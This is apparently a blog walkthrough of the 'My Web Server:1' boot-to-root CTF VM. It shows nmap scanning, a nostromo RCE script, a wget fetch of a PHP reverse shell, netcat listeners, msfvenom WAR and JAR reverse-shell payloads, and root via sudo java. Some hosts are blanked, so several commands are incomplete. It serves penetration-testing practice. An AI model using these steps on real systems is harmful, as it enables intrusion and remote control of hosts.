MY WEB SERVER:1 walkthrough


Welcome to “My Web Server”

This boot to root VM is designed for testing your pentesting skills and concepts. It consists of some well known things but it encourages you to use the functionalities rather than vulnerablities of target.

Goal: Get the root flag of the target.

Difficulty: Medium/Intermediate Level

Need hints? Twitter @akankshavermasv

DHCP is enabled

Your feedback is really valuable for me! Twitter @akankshavermasv

Was there something that you didn’t like about this VM?

Please let me know so that I can make more interesting challenges in the future.

Good Luck..!!!

This works better with VirtualBox rather than VMware.


# nmap -v


#nmap -v -sV -sC -O -A -p- -oN nmap.txt


After enumrating various services on machine i found nostromo 1.9.6 vunreable to RCE.

On further enumration i got an bash script.

./ 2222 id


/tem dir is writeable and wget service is also accessible.

So i enabled my python server on 8080 port and transfered my php shell file to target machine.

# ./ 2222 cd /tmp/; wget

This succesfully transfers our reverse shell on traget machine. Now we just have to execute our php file and we get shell.

I just turn on my reverse shell listener.

getting a shell

#./ 2222 “php /tmp/shell.php”


#python3 -c ‘import pty; pty.spawn(“/bin/bash”)’


#stty raw -echo



#export SHELL=bash

#export TERM=xterm-256color


After some enumration i got an sudoer file.

#cat /etc/sudoers.d/mysudo

We can run java as root by tomcat user without password.

After going through passwd file, we cannot switch to tomcat user by password.

Finding the world readables, i got a tomcat writeable file.

#cat /usr/local/tomcat/conf/tomcat-users.xml

Their is a tomcat service running on port 8080

logining with id and password


upload a reverse shell in .WAR file.

#msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4455-f war > shell.war

After uploading the shell file we can see it in application manager.

#nc -lvp 4455

upgrade to tty shell.

#sudo -l

#msfvenom — platform java -f jar -p java/shell_reverse_tcp LHOST= LPORT=7777 -o payload.jar

starting python server and transfering payload.

Now, /opt/tomcat directory is writeable.


Now running this exploit as root and starting listener on port 7777.



Certified Ethical Hacker